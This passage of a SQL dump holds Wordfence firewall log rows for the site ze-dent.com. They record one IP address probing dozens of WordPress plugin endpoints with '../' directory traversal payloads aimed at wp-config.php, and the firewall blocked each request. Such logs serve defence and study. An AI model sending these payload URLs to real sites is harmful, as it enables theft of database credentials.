(5166, 1595955765.265300, 1595955765.245000, 0x00000000000000000000ffffb29f2586, 0, 403, 0, 0, 0, 'http://www.ze-dent.com/mdocs-posts/?mdocs-img-preview=..%2Fwp-config.php', NULL, 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0', 'blocked:waf', 'Directory Traversal - wp-config.php', '{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1ttZG9jcy1pbWctcHJldmlld10=\",\"paramValue\":\"Li4vd3AtY29uZmlnLnBocA==\",\"path\":\"L21kb2NzLXBvc3RzLw==\",\"category\":\"lfi\",\"ssl\":0}'),
(5167, 1595955804.384222, 1595955804.334200, 0x00000000000000000000ffffb29f2586, 0, 403, 0, 0, 0, 'http://www.ze-dent.com/wp-content/plugins/zingiri-web-shop/fws/ajax/init.inc.php?wpabspath=..%2F..%2F..%2F..%2F..%2Fwp-config.php', NULL, 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0', 'blocked:waf', 'Directory Traversal - wp-config.php', '{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1t3cGFic3BhdGhd\",\"paramValue\":\"Li4vLi4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy96aW5naXJpLXdlYi1zaG9wL2Z3cy9hamF4L2luaXQuaW5jLnBocA==\",\"category\":\"lfi\",\"ssl\":0}'),
(5168, 1595955804.234809, 1595955804.198600, 0x00000000000000000000ffffb29f2586, 0, 403, 0, 0, 0, 'http://www.ze-dent.com/wp-content/plugins/zingiri-forum/mybb/memberlist.php?language=..%2F..%2F..%2F..%2Fwp-config.php', NULL, 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0', 'blocked:waf', 'Directory Traversal - wp-config.php', '{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tsYW5ndWFnZV0=\",\"paramValue\":\"Li4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy96aW5naXJpLWZvcnVtL215YmIvbWVtYmVybGlzdC5waHA=\",\"category\":\"lfi\",\"ssl\":0}'),
(5169, 1595955804.120671, 1595955804.097800, 0x00000000000000000000ffffb29f2586, 0, 403, 0, 0, 0, 'http://www.ze-dent.com/wp-content/plugins/wptf-image-gallery/lib-mbox/ajax_load.php?url=..%2F..%2F..%2F..%2Fwp-config.php', NULL, 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0', 'blocked:waf', 'Directory Traversal - wp-config.php', '{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1t1cmxd\",\"paramValue\":\"Li4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93cHRmLWltYWdlLWdhbGxlcnkvbGliLW1ib3gvYWpheF9sb2FkLnBocA==\",\"category\":\"lfi\",\"ssl\":0}'),
(5170, 1595955804.020066, 1595955803.974400, 0x00000000000000000000ffffb29f2586, 0, 403, 0, 0, 0, 'http://www.ze-dent.com/wp-content/plugins/wpeasystats/export.php?homep=..%2F..%2F..%2Fwp-config.php', NULL, 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0', 'blocked:waf', 'Directory Traversal - wp-config.php', '{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tob21lcF0=\",\"paramValue\":\"Li4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93cGVhc3lzdGF0cy9leHBvcnQucGhw\",\"category\":\"lfi\",\"ssl\":0}'),
(5171, 1595955803.843143, 1595955803.797700, 0x00000000000000000000ffffb29f2586, 0, 403, 0, 0, 0, 'http://www.ze-dent.com/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=..%2F..%2F..%2Fwp-config.php', NULL, 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0', 'blocked:waf', 'Directory Traversal - wp-config.php', '{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1t1cmxd\",\"paramValue\":\"Li4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC13aXRoLXNwcml0ei93cC5zcHJpdHouY29udGVudC5maWx0ZXIucGhw\",\"category\":\"lfi\",\"ssl\":0}'),
(5172, 1595955803.706702, 1595955803.669200, 0x00000000000000000000ffffb29f2586, 0, 403, 0, 0, 0, 'http://www.ze-dent.com/wp-content/plugins/wp-table/js/wptable-button.phpp?wpPATH=..%2F..%2F..%2F..%2Fwp-config.php', NULL, 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0', 'blocked:waf', 'Directory Traversal - wp-config.php', '{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1t3cFBBVEhd\",\"paramValue\":\"Li4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC10YWJsZS9qcy93cHRhYmxlLWJ1dHRvbi5waHBw\",\"category\":\"lfi\",\"ssl\":0}'),
(5173, 1595955803.589529, 1595955803.544800, 0x00000000000000000000ffffb29f2586, 0, 403, 0, 0, 0, 'http://www.ze-dent.com/wp-content/plugins/wp-swimteam/include/user/download.php?file=..%2F..%2F..%2F..%2F..%2Fwp-config.php', NULL, 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0', 'blocked:waf', 'Directory Traversal - wp-config.php', '{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tmaWxlXQ==\",\"paramValue\":\"Li4vLi4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC1zd2ltdGVhbS9pbmNsdWRlL3VzZXIvZG93bmxvYWQucGhw\",\"category\":\"lfi\",\"ssl\":0}'),
(5174, 1595955803.428358, 1595955803.394900, 0x00000000000000000000ffffb29f2586, 0, 403, 0, 0, 0, 'http://www.ze-dent.com/wp-content/plugins/wp-source-control/downloadfiles/download.php?path=..%2F..%2F..%2F..%2Fwp-config.php', NULL, 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0', 'blocked:waf', 'Directory Traversal - wp-config.php', '{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1twYXRoXQ==\",\"paramValue\":\"Li4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC1zb3VyY2UtY29udHJvbC9kb3dubG9hZGZpbGVzL2Rvd25sb2FkLnBocA==\",\"category\":\"lfi\",\"ssl\":0}'),
(5175, 1595955803.216359, 1595955803.145600, 0x00000000000000000000ffffb29f2586, 0, 403, 0, 0, 0, 'http://www.ze-dent.com/wp-content/plugins/wp-publication-archive/includes/openfile.php?file=..%2F..%2F..%2F..%2Fwp-config.php', NULL, 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0', 'blocked:waf', 'Directory Traversal - wp-config.php', '{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tmaWxlXQ==\",\"paramValue\":\"Li4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC1wdWJsaWNhdGlvbi1hcmNoaXZlL2luY2x1ZGVzL29wZW5maWxlLnBocA==\",\"category\":\"lfi\",\"ssl\":0}'),
(5176, 1595955803.077705, 1595955803.040900, 0x00000000000000000000ffffb29f2586, 0, 403, 0, 0, 0, 'http://www.ze-dent.com/wp-content/plugins/wp-mon/assets/download.php?type=octet%2Fstream&path=..%2F..%2F..%2F..%2F&name=wp-config.php', NULL, 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0', 'blocked:waf', 'Directory Traversal', '{\"learningMode\":0,\"failedRules\":\"12\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1twYXRoXQ==\",\"paramValue\":\"Li4vLi4vLi4vLi4v\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC1tb24vYXNzZXRzL2Rvd25sb2FkLnBocA==\",\"category\":\"lfi\",\"ssl\":0}'),
(5177, 1595955802.973661, 1595955802.930100, 0x00000000000000000000ffffb29f2586, 0, 403, 0, 0, 0, 'http://www.ze-dent.com/wp-content/plugins/wp-miniaudioplayer/map_download.php?fileurl=..%2F..%2F..%2Fwp-config.php', NULL, 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0', 'blocked:waf', 'Directory Traversal - wp-config.php', '{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tmaWxldXJsXQ==\",\"paramValue\":\"Li4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC1taW5pYXVkaW9wbGF5ZXIvbWFwX2Rvd25sb2FkLnBocA==\",\"category\":\"lfi\",\"ssl\":0}'),
(5178, 1595955802.859442, 1595955802.814000, 0x00000000000000000000ffffb29f2586, 0, 403, 0, 0, 0, 'http://www.ze-dent.com/wp-content/plugins/wp-lytebox/main.php?pg=..%2F..%2F..%2Fwp-config.php', NULL, 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0', 'blocked:waf', 'Directory Traversal - wp-config.php', '{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1twZ10=\",\"paramValue\":\"Li4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC1seXRlYm94L21haW4ucGhw\",\"category\":\"lfi\",\"ssl\":0}'),
(5179, 1595955802.713381, 1595955802.666100, 0x00000000000000000000ffffb29f2586, 0, 403, 0, 0, 0, 'http://www.ze-dent.com/wp-content/plugins/wp-imagezoom/download.php?file=..%2F..%2F..%2Fwp-config.php', NULL, 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0', 'blocked:waf', 'Directory Traversal - wp-config.php', '{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tmaWxlXQ==\",\"paramValue\":\"Li4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC1pbWFnZXpvb20vZG93bmxvYWQucGhw\",\"category\":\"lfi\",\"ssl\":0}'),
(5180, 1595955802.589232, 1595955802.544900, 0x00000000000000000000ffffb29f2586, 0, 403, 0, 0, 0, 'http://www.ze-dent.com/wp-content/plugins/wp-filemanager/incl/libfile.php?path=..%2F..%2F..%2F..%2F&filename=wp-config.php&action=download', NULL, 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0', 'blocked:waf', 'Directory Traversal', '{\"learningMode\":0,\"failedRules\":\"12\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1twYXRoXQ==\",\"paramValue\":\"Li4vLi4vLi4vLi4v\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC1maWxlbWFuYWdlci9pbmNsL2xpYmZpbGUucGhw\",\"category\":\"lfi\",\"ssl\":0}'),
(5181, 1595955802.422496, 1595955802.373800, 0x00000000000000000000ffffb29f2586, 0, 403, 0, 0, 0, 'http://www.ze-dent.com/wp-content/plugins/wp-ecommerce-shop-styling/includes/download.php?filename=..%2F..%2F..%2F..%2Fwp-config.php', NULL, 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0', 'blocked:waf', 'Directory Traversal - wp-config.php', '{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tmaWxlbmFtZV0=\",\"paramValue\":\"Li4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC1lY29tbWVyY2Utc2hvcC1zdHlsaW5nL2luY2x1ZGVzL2Rvd25sb2FkLnBocA==\",\"category\":\"lfi\",\"ssl\":0}'),
(5182, 1595955802.295657, 1595955802.253100, 0x00000000000000000000ffffb29f2586, 0, 403, 0, 0, 0, 'http://www.ze-dent.com/wp-content/plugins/wp-custom-pages/wp-download.php?url=..%2F..%2F..%2Fwp-config.php', NULL, 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0', 'blocked:waf', 'Directory Traversal - wp-config.php', '{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1t1cmxd\",\"paramValue\":\"Li4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC1jdXN0b20tcGFnZXMvd3AtZG93bmxvYWQucGhw\",\"category\":\"lfi\",\"ssl\":0}'),
(5183, 1595955802.186121, 1595955802.141500, 0x00000000000000000000ffffb29f2586, 0, 403, 0, 0, 0, 'http://www.ze-dent.com/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=..%2F..%2F..%2Fwp-config.php', NULL, 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0', 'blocked:waf', 'Directory Traversal - wp-config.php', '{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1t3cFBBVEhd\",\"paramValue\":\"Li4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93b3JkdHViZS93b3JkdHViZS1idXR0b24ucGhw\",\"category\":\"lfi\",\"ssl\":0}'),
(5184, 1595955802.007728, 1595955801.961900, 0x00000000000000000000ffffb29f2586, 0, 403, 0, 0, 0, 'http://www.ze-dent.com/wp-content/plugins/wechat-broadcast/wechat/Image.php?url=..%2F..%2F..%2F..%2Fwp-config.php', NULL, 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0', 'blocked:waf', 'Directory Traversal - wp-config.php', '{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1t1cmxd\",\"paramValue\":\"Li4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93ZWNoYXQtYnJvYWRjYXN0L3dlY2hhdC9JbWFnZS5waHA=\",\"category\":\"lfi\",\"ssl\":0}'),
(5185, 1595955801.808732, 1595955801.764400, 0x00000000000000000000ffffb29f2586, 0, 403, 0, 0, 0, 'http://www.ze-dent.com/wp-content/plugins/website-contact-form-with-file-upload/lib/wide-image/image-processor.php?demo=..%2F..%2F..%2F..%2F..%2Fwp-config.php', NULL, 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0', 'blocked:waf', 'Directory Traversal - wp-config.php', '{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tkZW1vXQ==\",\"paramValue\":\"Li4vLi4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93ZWJzaXRlLWNvbnRhY3QtZm9ybS13aXRoLWZpbGUtdXBsb2FkL2xpYi93aWRlLWltYWdlL2ltYWdlLXByb2Nlc3Nvci5waHA=\",\"category\":\"lfi\",\"ssl\":0}'),
(5186, 1595955801.644436, 1595955801.596300, 0x00000000000000000000ffffb29f2586, 0, 403, 0, 0, 0, 'http://www.ze-dent.com/wp-content/plugins/ungallery/source_vuln.php?pic=..%2F..%2F..%2Fwp-config.php', NULL, 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0', 'blocked:waf', 'Directory Traversal - wp-config.php', '{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1twaWNd\",\"paramValue\":\"Li4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy91bmdhbGxlcnkvc291cmNlX3Z1bG4ucGhw\",\"category\":\"lfi\",\"ssl\":0}'),
(5187, 1595955801.504912, 1595955801.463100, 0x00000000000000000000ffffb29f2586, 0, 403, 0, 0, 0, 'http://www.ze-dent.com/wp-content/plugins/tinymce-thumbnail-gallery/php/download-image.php?href=..%2F..%2F..%2F..%2Fwp-config.php', NULL, 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0', 'blocked:waf', 'Directory Traversal - wp-config.php', '{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tocmVmXQ==\",\"paramValue\":\"Li4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy90aW55bWNlLXRodW1ibmFpbC1nYWxsZXJ5L3BocC9kb3dubG9hZC1pbWFnZS5waHA=\",\"category\":\"lfi\",\"ssl\":0}'),
(5188, 1595955801.395472, 1595955801.350500, 0x00000000000000000000ffffb29f2586, 0, 403, 0, 0, 0, 'http://www.ze-dent.com/wp-content/plugins/thinkun-remind/exportData.php?dirPath=..%2F..%2F..%2Fwp-config.php', NULL, 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0', 'blocked:waf', 'Directory Traversal - wp-config.php', '{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tkaXJQYXRoXQ==\",\"paramValue\":\"Li4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy90aGlua3VuLXJlbWluZC9leHBvcnREYXRhLnBocA==\",\"category\":\"lfi\",\"ssl\":0}'),
(5189, 1595955801.282245, 1595955801.242400, 0x00000000000000000000ffffb29f2586, 0, 403, 0, 0, 0, 'http://www.ze-dent.com/wp-content/plugins/thecartpress/checkout/CheckoutEditor.php?tcp_save_fields=true&tcp_class_name=asdf&tcp_class_path=..%2F..%2F..%2F..%2Fwp-config.php', NULL, 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0', 'blocked:waf', 'Directory Traversal - wp-config.php', '{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1t0Y3BfY2xhc3NfcGF0aF0=\",\"paramValue\":\"Li4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy90aGVjYXJ0cHJlc3MvY2hlY2tvdXQvQ2hlY2tvdXRFZGl0b3IucGhw\",\"category\":\"lfi\",\"ssl\":0}'),
(5190, 1595955801.164131, 1595955801.113000, 0x00000000000000000000ffffb29f2586, 0, 403, 0, 0, 0, 'http://www.ze-dent.com/wp-content/plugins/tera-charts/charts/zoomabletreemap.php?fn=..%2F..%2F..%2F..%2Fwp-config.php', NULL, 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0', 'blocked:waf', 'Directory Traversal - wp-config.php', '{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tmbl0=\",\"paramValue\":\"Li4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy90ZXJhLWNoYXJ0cy9jaGFydHMvem9vbWFibGV0cmVlbWFwLnBocA==\",\"category\":\"lfi\",\"ssl\":0}'),
(5191, 1595955801.036180, 1595955801.013800, 0x00000000000000000000ffffb29f2586, 0, 403, 0, 0, 0, 'http://www.ze-dent.com/wp-content/plugins/tera-charts/charts/treemap.php?fn=..%2F..%2F..%2F..%2Fwp-config.php', NULL, 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0', 'blocked:waf', 'Directory Traversal - wp-config.php', '{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tmbl0=\",\"paramValue\":\"Li4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy90ZXJhLWNoYXJ0cy9jaGFydHMvdHJlZW1hcC5waHA=\",\"category\":\"lfi\",\"ssl\":0}'),
(5192, 1595955800.947921, 1595955800.927300, 0x00000000000000000000ffffb29f2586, 0, 403, 0, 0, 0, 'http://www.ze-dent.com/wp-content/plugins/spicy-blogroll/spicy-blogroll-ajax.php?var2=..%2F..%2F..%2Fwp-config.php', NULL, 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0', 'blocked:waf', 'Directory Traversal - wp-config.php', '{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1t2YXIyXQ==\",\"paramValue\":\"Li4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9zcGljeS1ibG9ncm9sbC9zcGljeS1ibG9ncm9sbC1hamF4LnBocA==\",\"category\":\"lfi\",\"ssl\":0}'),
(5193, 1595955800.803686, 1595955800.783300, 0x00000000000000000000ffffb29f2586, 0, 403, 0, 0, 0, 'http://www.ze-dent.com/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=..%2F..%2F..%2F..%2Fwp-config.php', NULL, 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0', 'blocked:waf', 'Directory Traversal - wp-config.php', '{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tsaWJwYXRoXQ==\",\"paramValue\":\"Li4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9zbmlwbGV0cy9tb2R1bGVzL3N5bnRheF9oaWdobGlnaHQucGhw\",\"category\":\"lfi\",\"ssl\":0}'),
(5194, 1595955800.664317, 1595955800.644500, 0x00000000000000000000ffffb29f2586, 0, 403, 0, 0, 0, 'http://www.ze-dent.com/wp-content/plugins/site-import/admin/page.php?url=..%2F..%2F..%2F..%2Fwp-config.php', NULL, 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0', 'blocked:waf', 'Directory Traversal - wp-config.php', '{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1t1cmxd\",\"paramValue\":\"Li4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9zaXRlLWltcG9ydC9hZG1pbi9wYWdlLnBocA==\",\"category\":\"lfi\",\"ssl\":0}'),
(5195, 1595955800.580224, 1595955800.560100, 0x00000000000000000000ffffb29f2586, 0, 403, 0, 0, 0, 'http://www.ze-dent.com/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php', NULL, 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0', 'blocked:waf', 'Directory Traversal - wp-config.php', '{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1thamF4X3BhdGhd\",\"paramValue\":\"Li4vLi4vLi4vLi4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9zaXRlLWVkaXRvci9lZGl0b3IvZXh0ZW5zaW9ucy9wYWdlYnVpbGRlci9pbmNsdWRlcy9hamF4X3Nob3J0Y29kZV9wYXR0ZXJuLnBocA==\",\"category\":\"lfi\",\"ssl\":0}'),
(5196, 1595955800.474819, 1595955800.454700, 0x00000000000000000000ffffb29f2586, 0, 403, 0, 0, 0, 'http://www.ze-dent.com/wp-content/plugins/simple-image-manipulator/controller/download.php?filepath=..%2F..%2F..%2F..%2Fwp-config.php', NULL, 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0', 'blocked:waf', 'Directory Traversal - wp-config.php', '{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tmaWxlcGF0aF0=\",\"paramValue\":\"Li4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9zaW1wbGUtaW1hZ2UtbWFuaXB1bGF0b3IvY29udHJvbGxlci9kb3dubG9hZC5waHA=\",\"category\":\"lfi\",\"ssl\":0}'),
(5197, 1595955800.330380, 1595955800.309600, 0x00000000000000000000ffffb29f2586, 0, 403, 0, 0, 0, 'http://www.ze-dent.com/wp-content/plugins/simple-fields/simple_fields.php?wp_abspath=..%2F..%2F..%2Fwp-config.php', NULL, 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0', 'blocked:waf', 'Directory Traversal - wp-config.php', '{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1t3cF9hYnNwYXRoXQ==\",\"paramValue\":\"Li4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9zaW1wbGUtZmllbGRzL3NpbXBsZV9maWVsZHMucGhw\",\"category\":\"lfi\",\"ssl\":0}');
INSERT INTO `zdenl_wfhits` (`id`, `attackLogTime`, `ctime`, `IP`, `jsRun`, `statusCode`, `isGoogle`, `userID`, `newVisit`, `URL`, `referer`, `UA`, `action`, `actionDescription`, `actionData`) VALUES
(5198, 1595955800.245644, 1595955800.225600, 0x00000000000000000000ffffb29f2586, 0, 403, 0, 0, 0, 'http://www.ze-dent.com/wp-content/plugins/simple-download-button-shortcode/simple-download-button_dl.php?file=..%2F..%2F..%2Fwp-config.php', NULL, 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0', 'blocked:waf', 'Directory Traversal - wp-config.php', '{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tmaWxlXQ==\",\"paramValue\":\"Li4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9zaW1wbGUtZG93bmxvYWQtYnV0dG9uLXNob3J0Y29kZS9zaW1wbGUtZG93bmxvYWQtYnV0dG9uX2RsLnBocA==\",\"category\":\"lfi\",\"ssl\":0}'),
(5199, 1595955800.160532, 1595955800.139800, 0x00000000000000000000ffffb29f2586, 0, 403, 0, 0, 0, 'http://www.ze-dent.com/wp-content/plugins/sf-booking/lib/downloads.php?file=..%2F..%2F..%2F..%2Fwp-config.php', NULL, 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0', 'blocked:waf', 'Directory Traversal - wp-config.php', '{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tmaWxlXQ==\",\"paramValue\":\"Li4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9zZi1ib29raW5nL2xpYi9kb3dubG9hZHMucGhw\",\"category\":\"lfi\",\"ssl\":0}'),
